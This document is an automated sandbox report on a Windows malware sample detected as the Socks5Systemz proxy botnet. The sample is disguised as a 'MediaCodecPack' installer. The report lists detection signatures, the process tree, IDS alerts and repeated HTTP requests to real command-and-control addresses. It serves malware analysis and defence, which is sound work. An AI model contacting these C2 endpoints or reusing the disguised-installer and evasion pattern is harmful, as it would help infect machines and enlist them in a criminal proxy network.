Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
newwork.exe.1.exe

Overview

General Information

Sample name:newwork.exe.1.exe
Analysis ID:1577462
MD5:27b4fa67c0810bc212077971a00854ea
SHA1:39d4dbe69f339c608a3f9ecf7f718c25e1c0dfbb
SHA256:2fc18ce155e0b723ffe70b0ed7fa5ff85a03b50d90367e8a1c5591e88af2089e
Tags:bulletproofexeSocks5Systemzuser-abus3reports
Infos:

Detection

Socks5Systemz
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Yara detected Socks5Systemz
AI detected suspicious sample
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • newwork.exe.1.exe (PID: 8168 cmdline: "C:\Users\user\Desktop\newwork.exe.1.exe" MD5: 27B4FA67C0810BC212077971A00854EA)
    • newwork.exe.1.tmp (PID: 7208 cmdline: "C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp" /SL5="$2047E,3065697,56832,C:\Users\user\Desktop\newwork.exe.1.exe" MD5: ED6A19AD054AD0172201AF725324781B)
      • mediacodecpack.exe (PID: 7404 cmdline: "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i MD5: 49FC2D4BA26F2EEF94CCC6B71EB0AD96)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-D6CVE.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        00000003.00000000.1336954414.0000000000401000.00000020.00000001.01000000.00000009.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
            00000001.00000002.2575850575.0000000005A10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              00000003.00000002.2575281871.0000000002C66000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                Process Memory Space: mediacodecpack.exe PID: 7404JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                  SourceRuleDescriptionAuthorStrings
                  3.0.mediacodecpack.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T13:50:44.078830+010020287653Unknown Traffic192.168.2.1049838188.119.66.185443TCP
                    2024-12-18T13:50:46.393102+010020287653Unknown Traffic192.168.2.1049848188.119.66.185443TCP
                    2024-12-18T13:50:52.215337+010020287653Unknown Traffic192.168.2.1049860188.119.66.185443TCP
                    2024-12-18T13:50:54.683435+010020287653Unknown Traffic192.168.2.1049866188.119.66.185443TCP
                    2024-12-18T13:50:57.372299+010020287653Unknown Traffic192.168.2.1049873188.119.66.185443TCP
                    2024-12-18T13:50:59.690513+010020287653Unknown Traffic192.168.2.1049881188.119.66.185443TCP
                    2024-12-18T13:51:02.248787+010020287653Unknown Traffic192.168.2.1049887188.119.66.185443TCP
                    2024-12-18T13:51:04.724066+010020287653Unknown Traffic192.168.2.1049896188.119.66.185443TCP
                    2024-12-18T13:51:07.197577+010020287653Unknown Traffic192.168.2.1049901188.119.66.185443TCP
                    2024-12-18T13:51:09.461347+010020287653Unknown Traffic192.168.2.1049905188.119.66.185443TCP
                    2024-12-18T13:51:11.743256+010020287653Unknown Traffic192.168.2.1049910188.119.66.185443TCP
                    2024-12-18T13:51:13.998036+010020287653Unknown Traffic192.168.2.1049916188.119.66.185443TCP
                    2024-12-18T13:51:16.560803+010020287653Unknown Traffic192.168.2.1049923188.119.66.185443TCP
                    2024-12-18T13:51:19.083606+010020287653Unknown Traffic192.168.2.1049930188.119.66.185443TCP
                    2024-12-18T13:51:21.596955+010020287653Unknown Traffic192.168.2.1049936188.119.66.185443TCP
                    2024-12-18T13:51:23.865961+010020287653Unknown Traffic192.168.2.1049943188.119.66.185443TCP
                    2024-12-18T13:51:26.136097+010020287653Unknown Traffic192.168.2.1049950188.119.66.185443TCP
                    2024-12-18T13:51:28.436908+010020287653Unknown Traffic192.168.2.1049956188.119.66.185443TCP
                    2024-12-18T13:51:30.915113+010020287653Unknown Traffic192.168.2.1049963188.119.66.185443TCP
                    2024-12-18T13:51:33.333519+010020287653Unknown Traffic192.168.2.1049969188.119.66.185443TCP
                    2024-12-18T13:51:35.870738+010020287653Unknown Traffic192.168.2.1049975188.119.66.185443TCP
                    2024-12-18T13:51:38.316315+010020287653Unknown Traffic192.168.2.1049981188.119.66.185443TCP
                    2024-12-18T13:51:40.821190+010020287653Unknown Traffic192.168.2.1049989188.119.66.185443TCP
                    2024-12-18T13:51:43.173050+010020287653Unknown Traffic192.168.2.1049995188.119.66.185443TCP
                    2024-12-18T13:51:45.698502+010020287653Unknown Traffic192.168.2.1050001188.119.66.185443TCP
                    2024-12-18T13:51:48.203505+010020287653Unknown Traffic192.168.2.1050004188.119.66.185443TCP
                    2024-12-18T13:51:50.614745+010020287653Unknown Traffic192.168.2.1050005188.119.66.185443TCP
                    2024-12-18T13:51:52.924243+010020287653Unknown Traffic192.168.2.1050006188.119.66.185443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T13:50:44.786700+010028032742Potentially Bad Traffic192.168.2.1049838188.119.66.185443TCP
                    2024-12-18T13:50:47.182885+010028032742Potentially Bad Traffic192.168.2.1049848188.119.66.185443TCP
                    2024-12-18T13:50:53.101821+010028032742Potentially Bad Traffic192.168.2.1049860188.119.66.185443TCP
                    2024-12-18T13:50:55.402293+010028032742Potentially Bad Traffic192.168.2.1049866188.119.66.185443TCP
                    2024-12-18T13:50:58.056391+010028032742Potentially Bad Traffic192.168.2.1049873188.119.66.185443TCP
                    2024-12-18T13:51:00.489357+010028032742Potentially Bad Traffic192.168.2.1049881188.119.66.185443TCP
                    2024-12-18T13:51:02.932989+010028032742Potentially Bad Traffic192.168.2.1049887188.119.66.185443TCP
                    2024-12-18T13:51:05.514546+010028032742Potentially Bad Traffic192.168.2.1049896188.119.66.185443TCP
                    2024-12-18T13:51:07.875652+010028032742Potentially Bad Traffic192.168.2.1049901188.119.66.185443TCP
                    2024-12-18T13:51:10.181163+010028032742Potentially Bad Traffic192.168.2.1049905188.119.66.185443TCP
                    2024-12-18T13:51:12.428721+010028032742Potentially Bad Traffic192.168.2.1049910188.119.66.185443TCP
                    2024-12-18T13:51:14.806062+010028032742Potentially Bad Traffic192.168.2.1049916188.119.66.185443TCP
                    2024-12-18T13:51:17.242829+010028032742Potentially Bad Traffic192.168.2.1049923188.119.66.185443TCP
                    2024-12-18T13:51:19.761430+010028032742Potentially Bad Traffic192.168.2.1049930188.119.66.185443TCP
                    2024-12-18T13:51:22.288127+010028032742Potentially Bad Traffic192.168.2.1049936188.119.66.185443TCP
                    2024-12-18T13:51:24.562804+010028032742Potentially Bad Traffic192.168.2.1049943188.119.66.185443TCP
                    2024-12-18T13:51:26.821610+010028032742Potentially Bad Traffic192.168.2.1049950188.119.66.185443TCP
                    2024-12-18T13:51:29.120824+010028032742Potentially Bad Traffic192.168.2.1049956188.119.66.185443TCP
                    2024-12-18T13:51:31.622068+010028032742Potentially Bad Traffic192.168.2.1049963188.119.66.185443TCP
                    2024-12-18T13:51:34.088417+010028032742Potentially Bad Traffic192.168.2.1049969188.119.66.185443TCP
                    2024-12-18T13:51:36.552860+010028032742Potentially Bad Traffic192.168.2.1049975188.119.66.185443TCP
                    2024-12-18T13:51:39.002791+010028032742Potentially Bad Traffic192.168.2.1049981188.119.66.185443TCP
                    2024-12-18T13:51:41.523825+010028032742Potentially Bad Traffic192.168.2.1049989188.119.66.185443TCP
                    2024-12-18T13:51:43.939637+010028032742Potentially Bad Traffic192.168.2.1049995188.119.66.185443TCP
                    2024-12-18T13:51:46.468759+010028032742Potentially Bad Traffic192.168.2.1050001188.119.66.185443TCP
                    2024-12-18T13:51:48.968184+010028032742Potentially Bad Traffic192.168.2.1050004188.119.66.185443TCP
                    2024-12-18T13:51:51.353310+010028032742Potentially Bad Traffic192.168.2.1050005188.119.66.185443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4Avira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e3008881325Avira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8Avira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055Avira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484Avira URL Cloud: Label: malware
                    Source: newwork.exe.1.exeReversingLabs: Detection: 15%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045D188
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0045D254 ArcFourCrypt,1_2_0045D254
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0045D23C ArcFourCrypt,1_2_0045D23C
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeUnpacked PE file: 3.2.mediacodecpack.exe.400000.0.unpack
                    Source: newwork.exe.1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1Jump to behavior
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.10:49838 version: TLS 1.2
                    Source: Binary string: msvcp71.pdbx# source: is-VMCDM.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-8I59M.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-VMCDM.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-UJAIS.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-8I59M.tmp.1.dr
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,1_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose,1_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463CDC
                    Source: global trafficTCP traffic: 192.168.2.10:49854 -> 89.105.201.183:2024
                    Source: Joe Sandbox ViewIP Address: 188.119.66.185 188.119.66.185
                    Source: Joe Sandbox ViewIP Address: 89.105.201.183 89.105.201.183
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49838 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49848 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49860 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49866 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49873 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49881 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49887 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49901 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49905 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49896 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49910 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49930 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49943 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49950 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49956 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49963 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49981 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49989 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49995 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49969 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49916 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:50001 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:50006 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:50004 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49936 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49975 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:50005 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.10:49923 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49866 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49873 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49910 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49930 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49943 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49848 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49838 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49956 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49896 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49936 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49989 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49975 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:50004 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49963 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49905 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49881 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49887 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49995 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49916 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49950 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:50001 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49860 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49901 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49923 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49969 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49981 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:50005 -> 188.119.66.185:443
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
